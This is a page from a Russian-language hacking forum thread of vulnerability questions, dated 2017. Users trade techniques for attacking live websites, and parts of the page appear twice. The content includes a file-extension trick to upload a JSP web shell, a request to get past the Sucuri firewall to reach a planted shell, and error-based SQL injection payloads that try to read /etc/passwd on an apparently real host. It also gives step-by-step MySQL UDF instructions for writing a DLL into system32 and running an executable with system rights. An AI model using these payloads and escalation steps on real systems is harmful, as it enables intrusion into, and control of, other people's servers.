Вопросы по уязвимостям - Страница 361

S00pY · 26.04.2017, 13:13

Цитата:

Сообщение от mikhailtpm

Пытаюсь залить jsp шелл, но не пускает, вот кукок сорца:

Обойти можно как-то?

Если проблема только в blacklist, .jspx должно помочь

mikhailtpm · 26.04.2017, 14:55

Супер! Помог, спасибо.
p.s. какой нормальный jsp шелл? Много чего перепробовал, полно шеллов от китайцев на китайском языке, но там фиг пойми что. Буду рад, если подкинете хороший jsp шелл

Limera1n · 26.04.2017, 18:13

Как обойти Sucuri в браузере? Пробую пройти на закладку, вылазиет окно Sucuri WebSite Firewall - Access Denied, пробую зайти на шелл в поддомене, та же история. Что делать? Как пройти?

mikhailtpm · 13.05.2017, 16:12

Возможно ли в burp suit-e заенкодить в intruder-e переменную в SSHA? Читал, что SSHA это base64 с SHA1 с солью, но чего-то не получается, когда вручную проверяю.

ACat · 06.06.2017, 10:50

ПОдскажите, есть иньекция типа:
INSERT INTO scms_static_banner (types,users,link,date_at,click_type) VALUES ('promotional_banner','sql_inj','.htm','2017-06-05 20:02:27','close
')

можно ли это использовать, что бы заинсертить что-то куда-то, за пределами таблицы scms_static_banner?
Если да - как?

А так же, юзер=root. Это как-то можно использовать дабы записать шелл в данной консрукции? Если да, то как?

Спасибо.

is_ajax=true&plugin=main&action=checkPopupAds&data[user]='||(SELECT 3 FROM DUAL WHERE 1=1 AND (SELECT 5208 FROM(SELECT COUNT(0),CONCAT((SELECT concat(MID((7777777),1,40),user())),FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&data[link]=&data[type]=close

Цитата:

<div class="QUERY-ERROR">Внимание! Возникла ошибка SQL запроса: 
 INSERT INTO scms_static_banner (types,users,link,date_at,click_type) VALUES ('promotional_banner',''||(SELECT 3 FROM DUAL WHERE 1=1 AND (SELECT 5208 FROM(SELECT COUNT(0),CONCAT((SELECT concat(MID((7777777),1,40),user())),FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'','','2017-06-06 12:44:27','close

')
 

Ошибка: 
Duplicate entry '7777777root@web.hq.ua1' for key 'group_key'
</div>{"result":true,"content":1496749467,"error":nu ll}

одняко:

is_ajax=true&plugin=main&action=checkPopupAds&data[user]='||(SELECT 3 FROM DUAL WHERE 1=1 AND (SELECT 5208 FROM(SELECT COUNT(0),CONCAT((SELECT concat(MID((LOAD_FILE('/etc/passwd')),1,40),user())),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&data[link]=&data[type]=close

Цитата:

{"result":true,"content":1496749513,"error":nul l}

crlf · 09.07.2017, 15:32

https://www.cvedetails.com/cve/CVE-2016-5239/

Нужен PoC.

YuNi|[c · 23.07.2017, 12:50

привет
Столкнулся с нестандартным бд + там свой скриптовый язык.
MIVASCRIPT
MIVASQL
пруф
нашел скул но не нашел как раскрутит.
Кто в курсе

dr.Pilulkin · 07.08.2017, 03:00

Есть ситуация:
Windows 2003 x32.
Есть root на mysql на этой машине.
Могу записывать любой файл в любое место системы в том числе бинарники. (права system)

Есть php вебшелл на IIS c урезанными правами.
Php функции system() или exec() на вебшеле не отрабатывают "system() Unable to fork" (Нехватает прав?).
Вопрос: Как запустить свой файл? С system правами?

Пробовал через с:\windows\system32\wbem\mof\ неудачно.

Или может у кого есть библиотека .dll UDF функий для выполнения команд из под Mysql x32 скомпилированая?

upd:

Спасибо, нашел. Все сработало в лучшем виде.

Faaax · 08.08.2017, 17:29

Цитата:

Сообщение от dr.Pilulkin

Есть ситуация:
Windows 2003 x32.
Есть root на mysql на этой машине.
Могу записывать любой файл в любое место системы в том числе бинарники. (права system)

Есть php вебшелл на IIS c урезанными правами.
Php функции system() или exec() на вебшеле не отрабатывают "system() Unable to fork" (Нехватает прав?).
Вопрос: Как запустить свой файл? С system правами?

Пробовал через с:\windows\system32\wbem\mof\ неудачно.

Или может у кого есть библиотека .dll UDF функий для выполнения команд из под Mysql x32 скомпилированая?

upd:

Спасибо, нашел. Все сработало в лучшем виде.

Поделись инфой,тоже понадобилось.

dr.Pilulkin · 09.08.2017, 10:07

Ну смотри:
У нас есть root доступ к базе. Не через иньекцию.
(Через иньекцию мы не сможем зарегистрировать функцию)

Бывают специальные библиотеки добавляющие функции пользователя в mysql
(User Defined Function -> UDF)

https://rdot.org/forum/showthread.ph...b_mysqludf_sys

В нашем случае это lib_mysqludf_sys.dll.

Узнаем путь к папке плагинов. В mysql есть переменная plugin_dir.
Если она пуста или отсутствует то путь "c:/windows/system32"

Делаем запрос: SELECT @@plugin_dir
Переменная пуста

Делаем запрос: SELECT 0x[здесь весь код dll в hex] INTO DUMPFILE "c:/windows/system32/udf.dll"
Тем самым мы сохранили бинарник dll в c:/windows/system32/udf.dll
Тоже самое делаем с нашим test.exe

Регистрируем функцию:
CREATE FUNCTION sys_exec RETURNS string SONAME 'udf.dll';

Если нет ошибки.
Выполняем наш test.exe:
SELECT sys_exec("test.exe")

Если программа выполнилась то вернет 0

upd:

Да в последних версиях mysql файловые операции запрещены по умолчанию.

07.08.2017, 03:00	#3608
dr.Pilulkin Регистрация: 04.01.2011 Сообщений: 22 Репутация: 9	Есть ситуация: Windows 2003 x32. Есть root на mysql на этой машине. Могу записывать любой файл в любое место системы в том числе бинарники. (права system) Есть php вебшелл на IIS c урезанными правами. Php функции system() или exec() на вебшеле не отрабатывают "system() Unable to fork" (Нехватает прав?). Вопрос: Как запустить свой файл? С system правами? Пробовал через с:\windows\system32\wbem\mof\ неудачно. Или может у кого есть библиотека .dll UDF функий для выполнения команд из под Mysql x32 скомпилированая? upd: Спасибо, нашел. Все сработало в лучшем виде. Последний раз редактировалось dr.Pilulkin; 08.08.2017 в 06:16..

09.08.2017, 10:07	#3610
dr.Pilulkin Регистрация: 04.01.2011 Сообщений: 22 Репутация: 9	Ну смотри: У нас есть root доступ к базе. Не через иньекцию. (Через иньекцию мы не сможем зарегистрировать функцию) Бывают специальные библиотеки добавляющие функции пользователя в mysql (User Defined Function -> UDF) https://rdot.org/forum/showthread.ph...b_mysqludf_sys В нашем случае это lib_mysqludf_sys.dll. Узнаем путь к папке плагинов. В mysql есть переменная plugin_dir. Если она пуста или отсутствует то путь "c:/windows/system32" Делаем запрос: SELECT @@plugin_dir Переменная пуста Делаем запрос: SELECT 0x[здесь весь код dll в hex] INTO DUMPFILE "c:/windows/system32/udf.dll" Тем самым мы сохранили бинарник dll в c:/windows/system32/udf.dll Тоже самое делаем с нашим test.exe Регистрируем функцию: CREATE FUNCTION sys_exec RETURNS string SONAME 'udf.dll'; Если нет ошибки. Выполняем наш test.exe: SELECT sys_exec("test.exe") Если программа выполнилась то вернет 0 upd: Да в последних версиях mysql файловые операции запрещены по умолчанию. Последний раз редактировалось dr.Pilulkin; 09.08.2017 в 10:38..

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

26.04.2017, 14:55	#3602
mikhailtpm Регистрация: 01.07.2015 Сообщений: 67 Репутация: 0	Супер! Помог, спасибо. p.s. какой нормальный jsp шелл? Много чего перепробовал, полно шеллов от китайцев на китайском языке, но там фиг пойми что. Буду рад, если подкинете хороший jsp шелл

26.04.2017, 18:13	#3603
Limera1n Регистрация: 11.08.2014 Сообщений: 3 Репутация: 0	Как обойти Sucuri в браузере? Пробую пройти на закладку, вылазиет окно Sucuri WebSite Firewall - Access Denied, пробую зайти на шелл в поддомене, та же история. Что делать? Как пройти?

13.05.2017, 16:12	#3604
mikhailtpm Регистрация: 01.07.2015 Сообщений: 67 Репутация: 0	Возможно ли в burp suit-e заенкодить в intruder-e переменную в SSHA? Читал, что SSHA это base64 с SHA1 с солью, но чего-то не получается, когда вручную проверяю.

09.07.2017, 15:32	#3606
crlf Регистрация: 29.09.2015 Сообщений: 101 Репутация: 17	https://www.cvedetails.com/cve/CVE-2016-5239/ Нужен PoC.

23.07.2017, 12:50	#3607
YuNi\|[c Регистрация: 03.01.2011 Сообщений: 86 Репутация: 0	привет Столкнулся с нестандартным бд + там свой скриптовый язык. MIVASCRIPT MIVASQL пруф нашел скул но не нашел как раскрутит. Кто в курсе